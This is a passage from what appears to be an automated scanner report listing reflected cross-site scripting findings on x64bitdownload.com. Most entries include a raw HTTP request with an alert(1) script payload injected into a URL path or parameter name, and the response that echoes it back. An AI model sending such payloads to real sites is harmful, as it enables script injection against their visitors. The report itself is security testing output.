Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57543


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.htmld8f68"><script>alert(1)</script>c04ad26948f"/>
...[SNIP]...

4.1742. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ef3"><script>alert(1)</script>3ee45597a1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html?38ef3"><script>alert(1)</script>3ee45597a1a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57549


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html?38ef3"><script>alert(1)</script>3ee45597a1a=1"/>
...[SNIP]...

4.1743. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14448"><script>alert(1)</script>41f24c0c9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads14448"><script>alert(1)</script>41f24c0c9a/t-64-bit-oovoo-download-jrletedp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:23:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads14448"><script>alert(1)</script>41f24c0c9a/t-64-bit-oovoo-download-jrletedp.html" />
...[SNIP]...

4.1744. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ff1"><script>alert(1)</script>4d559d8a948 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-oovoo-download-jrletedp.html26ff1"><script>alert(1)</script>4d559d8a948 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60497


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-oovoo-download-jrletedp.html26ff1"><script>alert(1)</script>4d559d8a948"/>
...[SNIP]...

4.1745. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d51"><script>alert(1)</script>4f51ebb208e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-oovoo-download-jrletedp.html?e1d51"><script>alert(1)</script>4f51ebb208e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60503


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-oovoo-download-jrletedp.html?e1d51"><script>alert(1)</script>4f51ebb208e=1"/>
...[SNIP]...

4.1746. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37801"><script>alert(1)</script>ad83e3f4619 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads37801"><script>alert(1)</script>ad83e3f4619/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:17 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=td6rkej4n5bvmqp9ffd7osao76; expires=Sat, 23 Jul 2011 14:59:17 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads37801"><script>alert(1)</script>ad83e3f4619/t-64-bit-ozum-download-lhtivuds.html" />
...[SNIP]...

4.1747. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47648"><script>alert(1)</script>f734d0ee91b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html47648"><script>alert(1)</script>f734d0ee91b HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:59:20 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=fof603f2p2pdrhm2a7rhh57a41; expires=Sat, 23 Jul 2011 14:59:20 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57137


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html47648"><script>alert(1)</script>f734d0ee91b"/>
...[SNIP]...

4.1748. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 850ca"><script>alert(1)</script>6fff343f0ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html?850ca"><script>alert(1)</script>6fff343f0ed=1 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:59:04 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=d6q73p3k9jss96dppl7irlv675; expires=Sat, 23 Jul 2011 14:59:04 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57143


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html?850ca"><script>alert(1)</script>6fff343f0ed=1"/>
...[SNIP]...

4.1749. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3db1"><script>alert(1)</script>51fa849155c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsa3db1"><script>alert(1)</script>51fa849155c/t-64-bit-ozum-download-lhtivuds.html/x22 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:18:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsa3db1"><script>alert(1)</script>51fa849155c/t-64-bit-ozum-download-lhtivuds.html/x22" />
...[SNIP]...

4.1750. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d982"><script>alert(1)</script>b02d30346b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html1d982"><script>alert(1)</script>b02d30346b5/x22 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57145


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html1d982"><script>alert(1)</script>b02d30346b5/x22"/>
...[SNIP]...

4.1751. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 683a4"><script>alert(1)</script>5d118b29aed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html/x22683a4"><script>alert(1)</script>5d118b29aed HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57145


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html/x22683a4"><script>alert(1)</script>5d118b29aed"/>
...[SNIP]...

4.1752. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 967ee"><script>alert(1)</script>71fe059bb0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html/x22?967ee"><script>alert(1)</script>71fe059bb0c=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-ozum-download-lhtivuds.html/x22?967ee"><script>alert(1)</script>71fe059bb0c=1"/>
...[SNIP]...

4.1753. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3467"><script>alert(1)</script>d05bfef14e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsa3467"><script>alert(1)</script>d05bfef14e/t-64-bit-paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:18:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsa3467"><script>alert(1)</script>d05bfef14e/t-64-bit-paragon-extbrowser-download-xwigzbic.html" />
...[SNIP]...

4.1754. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b74d"><script>alert(1)</script>2f39237061 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html2b74d"><script>alert(1)</script>2f39237061 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54632


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html2b74d"><script>alert(1)</script>2f39237061"/>
...[SNIP]...

4.1755. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66a56"><script>alert(1)</script>621f1f0b522 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html?66a56"><script>alert(1)</script>621f1f0b522=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54640


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html?66a56"><script>alert(1)</script>621f1f0b522=1"/>
...[SNIP]...

4.1756. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4614"><script>alert(1)</script>35e4d9d2a2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsc4614"><script>alert(1)</script>35e4d9d2a2a/t-64-bit-pidgin-download-kkwthbed.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsc4614"><script>alert(1)</script>35e4d9d2a2a/t-64-bit-pidgin-download-kkwthbed.html" />
...[SNIP]...

4.1757. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d72b"><script>alert(1)</script>775e881c02c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-pidgin-download-kkwthbed.html3d72b"><script>alert(1)</script>775e881c02c HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-pidgin-download-kkwthbed.html3d72b"><script>alert(1)</script>775e881c02c"/>
...[SNIP]...

4.1758. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c708f"><script>alert(1)</script>5f593c9e2bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-pidgin-download-kkwthbed.html?c708f"><script>alert(1)</script>5f593c9e2bd=1 HTTP/1.1
